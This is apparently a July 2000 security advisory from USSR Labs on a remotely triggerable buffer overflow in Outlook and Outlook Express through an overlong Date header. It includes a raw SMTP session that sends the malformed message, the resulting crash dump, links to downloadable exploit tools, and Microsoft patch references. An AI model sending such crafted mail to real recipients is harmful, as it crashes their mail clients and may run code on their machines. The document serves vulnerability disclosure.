 
      

 Remotely Exploitable Buffer Overflow in Outlook "Malformed E-mail MIME Header" Vulnerability

 "the new generation of virus is here.  by sending a malformed e-mail you can run arbitrary code 
 on the remote machine."

 USSR Advisory Code:  USSR-2000050

 Release Date:
 July 19, 2000

 Systems Affected:
 Microsoft Outlook Express 4.0
 Microsoft Outlook Express 4.01
 Microsoft Outlook Express 5.0
 Microsoft Outlook Express 5.01
 Microsoft Outlook 97
 Microsoft Outlook 98
 Microsoft Outlook 2000


 THE PROBLEM:

 The Ussr Labs team has recently discovered an exploitable buffer
 overflow in all versions of Outlook.

 The vulnerability could enable a malicious sender of an e-mail
 message with a malformed header to cause and exploit a buffer overrun
 on a user's machine. The buffer overrun could crash Outlook Express, 
 Outlook e-mail client, or cause arbitrary code to run on the user's
 machine.  

 The danger in this vulnerability is that the buffer overrun would
 occur even if the user does not open or preview the e-mail message.

 This is because the buffer overrun occurs and the vulnerability is
 triggered during the process of downloading the e-mail message from
 server to client.  It is unlikely that a user will be able to delete
 the malicious message from the client.

 Instead, the user should request that the e-mail server administrator
 delete the message from the mail server.

 A nice little feature about this buffer overflow is that the mail is
 not deleted from the server, and next time outlook is loaded, it will
 try to download the mail, causing it to crash again.

 This security vulnerability research and the exploit development made
 by USSR Labs was based on a previous information supplied by a
 researcher of GFI Security, known as Metatron, since it against GFI
 policies to create exploits.

 DEMONSTRATION:

 To test this vulnerability I telneted to an SMTP server and sent the 
 following to myself:

HELO
MAIL FROM: BILLGATES@MICROSOFT.COM
RCPT TO: MY@EMAIL.COM
DATA
Date: Thu,13 Jun 2000 12:33:16 +1111111111111111111111111111111111111111111111111111111111111
.

QUIT

After the remote host closed the connection and sent mail to the appropriate 
address, upon receipt of the mail the following fault was generated by Outlook:

	-----------------------------------------------------------------------
	OUTLOOK caused an invalid page fault in
	module  at 00de:00aedc5a.
	Registers:
	EAX=80004005 CS=016f EIP=00aedc5a EFLGS=00010286
	EBX=70bd4899 SS=0177 ESP=0241ef94 EBP=31313131
	ECX=00000000 DS=0177 ESI=0241efc6 FS=2b57
	EDX=81c0500c ES=0177 EDI=0241efc4 GS=0000
	Bytes at CS:EIP:
	Stack dump:
	0241f360 0241f554 00000000 00000001 00000000 004580d0 00000054 00000054 
	0241efc4 0000003b 00000100 00000017 3131312b 31313131 31313131 31313131 
	-----------------------------------------------------------------------


 SPECIAL NOTE: We take no responsibility for this code.  It is for
 educational purposes only.

 EXPLOIT:

 Malformed Email Spawner.
 This code will create and send an e-mail message, that when 
 downloaded by outlook, will open http://www.ussrback.com

 Unix/Linux Perl Version:
 http://www.ussrback.com/outoutlook.pl

 Windows Console Version:
 http://www.ussrback.com/outoutlook.exe

 Windows Console Version Source:
 http://www.ussrback.com/outoutlook.zip


 Vendor Status:  
 Informed!, Contacted!.

 More Information:
 http://www.microsoft.com/technet/security/bulletin/ms00-043.asp

 Microsoft Security Bulletin MS00-045: Frequently Asked Questions, 
 http://www.microsoft.com/technet/security/bulletin/fq00-043.asp


 Fix: 
 The vulnerability can be eliminated by a default installation of
 either of the following upgrades:

 Internet Explorer 5.01 Service Pack 1,
 http://www.microsoft.com/Windows/ie/download/ie501sp1.htm

 Internet Explorer 5.5 on any system except Windows 2000,
 http://www.microsoft.com/windows/ie/download/ie55.htm


 Vendor   Url: http://www.microsoft.com
 Program  Url: http://www.microsoft.com/office/outlook/

 Disclaimer:
 The information within this paper may change without notice. We may
 not be held responsible for the use and/or potential effects of these
 programs or advisories.  Use them and read them at your own risk or
 not at all. You solely are responsible for this judgement. 

 Feedback:
 Please send suggestions, updates, and comments to:

 Underground Security Systems Research
 mail:labs@ussrback.com
 http://www.ussrback.com